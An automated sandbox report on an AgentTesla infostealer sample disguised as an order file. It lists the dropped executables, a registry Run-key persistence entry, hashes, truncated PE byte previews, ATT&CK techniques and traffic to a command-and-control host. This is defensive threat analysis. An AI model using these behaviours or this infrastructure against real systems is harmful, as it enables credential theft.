Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3180, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER #0554.exe PID: 6756, type: MEMORY
Source: Yara match	File source: 28.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation	Valid Accounts1	Valid Accounts1	Disable or Modify Tools1	OS Credential Dumping1	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Credentials In Files1	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection312	Obfuscated Files or Information3	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder1	Software Packing1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Security Software Discovery111	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Virtualization/Sandbox Evasion3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Modify Registry1	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion3	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection312	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER #0554.exe	26%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs
C:\Users\user\adobe.exe	26%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
28.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://www.yandex.comsocks=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chongmei33.myddns.rocks	37.120.208.37	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.yandex.com	AddInProcess32.exe	false		high
http://ns.adobe.c/g	adobe.exe, 00000016.00000002.597326965.00000000012DA000.00000004.00000040.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.yandex.comsocks=	ORDER #0554.exe, 00000000.00000002.384637956.000000000474D000.00000004.00000001.sdmp, adobe.exe, 00000016.00000002.604899251.0000000004814000.00000004.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.120.208.37	unknown	Romania		9009	M247GB	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337007
Start date:	07.01.2021
Start time:	15:27:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER #0554.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/4@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.5% (good quality ratio 2.3%) Quality average: 48.1% Quality standard deviation: 41.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 169 Number of non-executed functions: 36
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 168.61.161.212, 23.210.248.85, 51.104.139.180, 92.122.213.247, 92.122.213.194, 93.184.221.240, 51.103.5.186, 8.248.119.254, 67.26.139.254, 67.27.157.254, 67.27.233.126, 8.253.95.249, 20.54.26.129, 51.104.144.132, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:28:27	API Interceptor	428x Sleep call for process: ORDER #0554.exe modified
15:28:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\adobe.exe
15:28:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\adobe.exe
15:29:47	API Interceptor	447x Sleep call for process: adobe.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
37.120.208.37	Payment Copy.exe	Get hash	malicious	Browse
	ORDER #2001228A.exe.exe	Get hash	malicious	Browse
	Payment Copy.doc.......exe	Get hash	malicious	Browse
	ORDER-207044.xLs.exe	Get hash	malicious	Browse
	ORDER #02676.doc.exe	Get hash	malicious	Browse
	ORDER #201006.exe	Get hash	malicious	Browse
	ORDER-2020912.doc..........exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
chongmei33.myddns.rocks	Quotation #01521.exe	Get hash	malicious	Browse	37.120.208.40

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
M247GB	LUJZShZCgN.exe	Get hash	malicious	Browse	38.132.99.154
	invoice-ID3626307348012.vbs	Get hash	malicious	Browse	188.72.124.19
	notepad.exe	Get hash	malicious	Browse	38.132.99.154
	e-dekont.html.exe	Get hash	malicious	Browse	45.141.152.18
	Dekont.pdf.exe	Get hash	malicious	Browse	45.141.152.18
	https://1drv.ms:443/o/s!BOO20WPJLvSjhUtXSLGoCosM9jOh?e=SfrfIiZMY0KxwMdDlySRtQ&at=9	Get hash	malicious	Browse	37.120.222.117
	QBuWlNpMIc.exe	Get hash	malicious	Browse	152.89.162.7
	Quotation #01521.exe	Get hash	malicious	Browse	37.120.208.40
	ORDER #0421 pdf.exe	Get hash	malicious	Browse	37.120.208.40
	xs1ALnpMCT.exe	Get hash	malicious	Browse	194.61.53.10
	0I2ddZZKv7.exe	Get hash	malicious	Browse	194.61.53.10
	Q2BZ01fmwK.exe	Get hash	malicious	Browse	194.61.53.10
	ndUmkEM8KO.exe	Get hash	malicious	Browse	194.61.53.10
	Payment Copy.exe	Get hash	malicious	Browse	37.120.208.37
	Pi.exe	Get hash	malicious	Browse	37.120.208.36
	ORDER #2001228A.exe.exe	Get hash	malicious	Browse	37.120.208.37
	ORDER #2001228A.exe	Get hash	malicious	Browse	37.120.208.36
	http://83.97.20.25	Get hash	malicious	Browse	83.97.20.25
	Payment Copy.doc.......exe	Get hash	malicious	Browse	37.120.208.36
	ORDER #07443.doc............exe	Get hash	malicious	Browse	37.120.208.36

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Dekont.pdf.exe	Get hash	malicious	Browse
	IMG_84755643#U00e2#U20ac#U00aegpj.exe	Get hash	malicious	Browse
	8WLxD8uxRN.exe	Get hash	malicious	Browse
	Quotation.exe	Get hash	malicious	Browse
	e-dekont.html.exe	Get hash	malicious	Browse
	Dekont.pdf.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	SWIFT77266255378434pdf.exe	Get hash	malicious	Browse
	SWIFT998775523434pdf.exe	Get hash	malicious	Browse
	SWIFT345343445pdf.exe	Get hash	malicious	Browse
	Order_1101201918_AUTECH.exe	Get hash	malicious	Browse
	1FXO8fI8R3.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.820883.21352.exe	Get hash	malicious	Browse
	SWIFT09775527743pdf.exe	Get hash	malicious	Browse
	Pi.exe	Get hash	malicious	Browse
	PAYMENT SLIP.EXE	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe	Get hash	malicious	Browse
	iZLqZLqNgq.exe	Get hash	malicious	Browse
	UVZxk61Vdc.exe	Get hash	malicious	Browse
	gVrKAqVUIw.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER #0554.exe.log Download File
Process:	C:\Users\user\Desktop\ORDER #0554.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1451
Entropy (8bit):	5.345862727722058
Encrypted:	false
SSDEEP:	24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84G1qE4j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovGm
MD5:	06F54CDBFEF62849AF5AE052722BD7B6
SHA1:	FB0250AAC2057D0B5BCE4CE130891E428F28DA05
SHA-256:	4C039B93A728B546F49C47ED8B448D40A3553CDAABB147067AEE3958133CB446
SHA-512:	34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\user\Desktop\ORDER #0554.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42080
Entropy (8bit):	6.2125074198825105
Encrypted:	false
SSDEEP:	384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5:	F2A47587431C466535F3C3D3427724BE
SHA1:	90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256:	23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512:	E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Dekont.pdf.exe, Detection: malicious, Browse Filename: IMG_84755643#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse Filename: 8WLxD8uxRN.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: e-dekont.html.exe, Detection: malicious, Browse Filename: Dekont.pdf.exe, Detection: malicious, Browse Filename: DHL_file 187652345643476245.exe, Detection: malicious, Browse Filename: SWIFT77266255378434pdf.exe, Detection: malicious, Browse Filename: SWIFT998775523434pdf.exe, Detection: malicious, Browse Filename: SWIFT345343445pdf.exe, Detection: malicious, Browse Filename: Order_1101201918_AUTECH.exe, Detection: malicious, Browse Filename: 1FXO8fI8R3.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Razy.820883.21352.exe, Detection: malicious, Browse Filename: SWIFT09775527743pdf.exe, Detection: malicious, Browse Filename: Pi.exe, Detection: malicious, Browse Filename: PAYMENT SLIP.EXE, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe, Detection: malicious, Browse Filename: iZLqZLqNgq.exe, Detection: malicious, Browse Filename: UVZxk61Vdc.exe, Detection: malicious, Browse Filename: gVrKAqVUIw.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................\|w......H........#...Q...................u.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o....(+...o,.....&...(-...........3..@......R...s.....s....(....:.(/.....}P...J.{P....o0..

C:\Users\user\adobe.exe Download File
Process:	C:\Users\user\Desktop\ORDER #0554.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	860672
Entropy (8bit):	5.729930794972315
Encrypted:	false
SSDEEP:	12288:NimUFs6FJQojoJEFQY3ryBKHJ1FzDzHZjVpm1qZ:Np6Fyo8JEFh3ryBmJ1F75jqoZ
MD5:	73CDB5F235B14379247B9F0E938E24DF
SHA1:	26BFBC24C1DB50F9C996649BD2EB7C2C8CA11C1E
SHA-256:	B2E52F028AAA499F514E7684C6FAE9F7DB0532CBBCE8FBEF0234159FBC2E628B
SHA-512:	23868DB5E35BC0E146B8B01222691B391E34018D1B07A87BD4AEE141375051E9BD7A5A5824551D8979AD5DA81DD2FE4D643D61143F4469E5E37737E52FBCFD23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-5..................T...........r... ........@.. ....................................`..................................q..S.......f....................`....................................................... ............... ..H............text...4R... ...T.................. ..`.rsrc...f............V..............@..@.reloc.......`....... ..............@..B.................r......H........F..,+......J.......&c...........................................z.{u.d6\.F.....:.8lj...~DT.P.r..{#...>.N...?f<L.^@....h ....".._J....g...~....f..~.c..qk..0z+.y.....jy.3.j..j#-..,.;?@..l!..;e.".......1 ).V.8..:.[.I....G/h.]..q.$C-`.?X....h...ln.q;...(@..x.%..m>.T.....d......0..u.fa7vm.;....<......:.v..aKD......^..-'a.N..6.H...e.~;..=."I...k..."....u....e.d...m..O......5aU..+k...._._Z.x.......]........?M=..9.R.%....,fi.3TvX.k0.-..F.X...5~u....

C:\Users\user\adobe.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\ORDER #0554.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.729930794972315
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ORDER #0554.exe
File size:	860672
MD5:	73cdb5f235b14379247b9f0e938e24df
SHA1:	26bfbc24c1db50f9c996649bd2eb7c2c8ca11c1e
SHA256:	b2e52f028aaa499f514e7684c6fae9f7db0532cbbce8fbef0234159fbc2e628b
SHA512:	23868db5e35bc0e146b8b01222691b391e34018d1b07a87bd4aee141375051e9bd7a5a5824551d8979ad5da81dd2fe4d643d61143f4469e5e37737e52fbcfd23
SSDEEP:	12288:NimUFs6FJQojoJEFQY3ryBKHJ1FzDzHZjVpm1qZ:Np6Fyo8JEFh3ryBmJ1F75jqoZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-5..................T...........r... ........@.. ....................................`................................

File Icon


Icon Hash:	e8d494caca8ad2a6

Static PE Info

General
Entrypoint:	0x4a722e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x17352DC5 [Tue May 4 11:51:33 1982 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa71d8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x2c966	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa5234	0xa5400	False	0.510120201399	data	5.63117687767	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x2c966	0x2ca00	False	0.225703562675	data	5.03100049312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd6000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xa82b0	0x48e2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xacb94	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0xbd3bc	0x94a8	data
RT_ICON	0xc6864	0x5488	data
RT_ICON	0xcbcec	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 63743, next used block 251658240
RT_ICON	0xcff14	0x25a8	data
RT_ICON	0xd24bc	0x10a8	data
RT_ICON	0xd3564	0x988	data
RT_ICON	0xd3eec	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xd4354	0x84	data
RT_VERSION	0xd43d8	0x3a4	data
RT_MANIFEST	0xd477c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013 :C8;F4@<GJ=J477@4=3@G4
Assembly Version	1.0.0.0
InternalName	NETMEE.exe
FileVersion	7.11.15.19
CompanyName	:C8;F4@<GJ=J477@4=3@G4
Comments	GBEIDHJBA?8B94H42DB7<=2
ProductName	B:@I@4GJEGG33C63@3B
ProductVersion	7.11.15.19
FileDescription	B:@I@4GJEGG33C63@3B
OriginalFilename	NETMEE.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 15:30:53.359024048 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:30:53.597774982 CET	57438	49752	37.120.208.37	192.168.2.3
Jan 7, 2021 15:30:53.598037958 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:30:53.598617077 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:30:54.036653996 CET	57438	49752	37.120.208.37	192.168.2.3
Jan 7, 2021 15:31:13.635273933 CET	57438	49752	37.120.208.37	192.168.2.3
Jan 7, 2021 15:31:13.644160986 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:31:14.311789989 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:31:14.364553928 CET	57438	49752	37.120.208.37	192.168.2.3
Jan 7, 2021 15:31:14.365520000 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:31:15.320936918 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:31:15.806283951 CET	57438	49752	37.120.208.37	192.168.2.3
Jan 7, 2021 15:31:15.806730032 CET	49752	57438	192.168.2.3	37.120.208.37
Jan 7, 2021 15:31:16.016705036 CET	57438	49752	37.120.208.37	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
